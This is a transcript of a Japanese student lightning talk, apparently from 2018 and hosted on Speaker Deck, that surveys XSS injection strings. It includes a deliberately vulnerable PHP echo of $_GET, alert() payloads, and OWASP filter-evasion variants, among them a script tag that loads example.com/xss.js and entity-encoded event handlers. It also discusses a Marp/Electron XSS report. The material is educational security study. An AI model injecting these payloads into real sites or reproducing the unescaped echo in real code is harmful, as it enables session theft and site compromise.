Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.5k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Query Prediction for Log Search for Distributed Tracing with External Monitoring Alerts
tomoyk
0
15
Root Cause Analysis for Middleware Issues by Kubernetes Resource Events / KST-2026
tomoyk
0
28
Reading HTTP Client Hints
tomoyk
0
130
Log message with JSON item count for root cause analysis in microservices
tomoyk
1
250
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
380
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
460
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
1
1k
検索性能に配慮した複製による分散ログ管理 / DPS-185
tomoyk
0
11
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
430
Other Decks in Technology
See All in Technology
SRE NEXT 2026 CfP レビュアーが語る聞きたくなるプロポーザルとは?
yutakawasaki0911
1
310
情シスのための生成AI実践ガイド2026 / Generative AI Practical Guide for Business Technology 2026
glidenote
0
240
今のWordPress の制作手法ってなにがあんねん?(改) / What’s the Deal with WordPress Development These Days?
tbshiki
0
450
ナレッジワーク IT情報系キャリア研究セッション資料(情報処理学会 第88回全国大会 )
kworkdev
PRO
0
190
フロントエンド刷新 4年間の軌跡
yotahada3
0
180
S3はフラットである –AWS公式SDKにも存在した、 署名付きURLにおけるパストラバーサル脆弱性– / JAWS DAYS 2026
flatt_security
0
1.8k
Oracle Cloud Infrastructure IaaS 新機能アップデート 2025/12 - 2026/2
oracle4engineer
PRO
0
130
Evolution of Claude Code & How to use features
oikon48
1
610
作りっぱなしで終わらせない! 価値を出し続ける AI エージェントのための「信頼性」設計 / Designing Reliability for AI Agents that Deliver Continuous Value
aoto
PRO
2
290
AI時代の「本当の」ハイブリッドクラウド — エージェントが実現した、あの頃の夢
ebibibi
0
120
進化するBits AI SREと私と組織
nulabinc
PRO
0
160
Postman v12 で変わる API開発ワークフロー (Postman v12 アップデート) / New API development workflow with Postman v12
yokawasa
0
120
Featured
See All Featured
DevOps and Value Stream Thinking: Enabling flow, efficiency and business value
helenjbeal
1
150
Facilitating Awesome Meetings
lara
57
6.8k
The Language of Interfaces
destraynor
162
26k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
26
3.4k
Making Projects Easy
brettharned
120
6.6k
Building a Modern Day E-commerce SEO Strategy
aleyda
45
8.9k
New Earth Scene 8
popppiees
1
1.7k
Money Talks: Using Revenue to Get Sh*t Done
nikkihalliwell
0
180
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
47
8k
Build your cross-platform service in a week with App Engine
jlugia
234
18k
Stop Working from a Prison Cell
hatefulcrawdad
274
21k
The Power of CSS Pseudo Elements
geoffreycrofte
82
6.2k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron
tomoyk
yutakawasaki0911
glidenote
tbshiki
kworkdev
yotahada3
flatt_security
oracle4engineer
oikon48
aoto
ebibibi
nulabinc
yokawasa
.png){kind=avatar}
helenjbeal
lara
destraynor
eileencodes
brettharned
aleyda
popppiees
nikkihalliwell
jlugia
hatefulcrawdad
geoffreycrofte
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_3.jpg){kind=link}
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_4.jpg){kind=link}
![[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_13.jpg){kind=link}
![[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_14.jpg){kind=link}
![[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_15.jpg){kind=link}
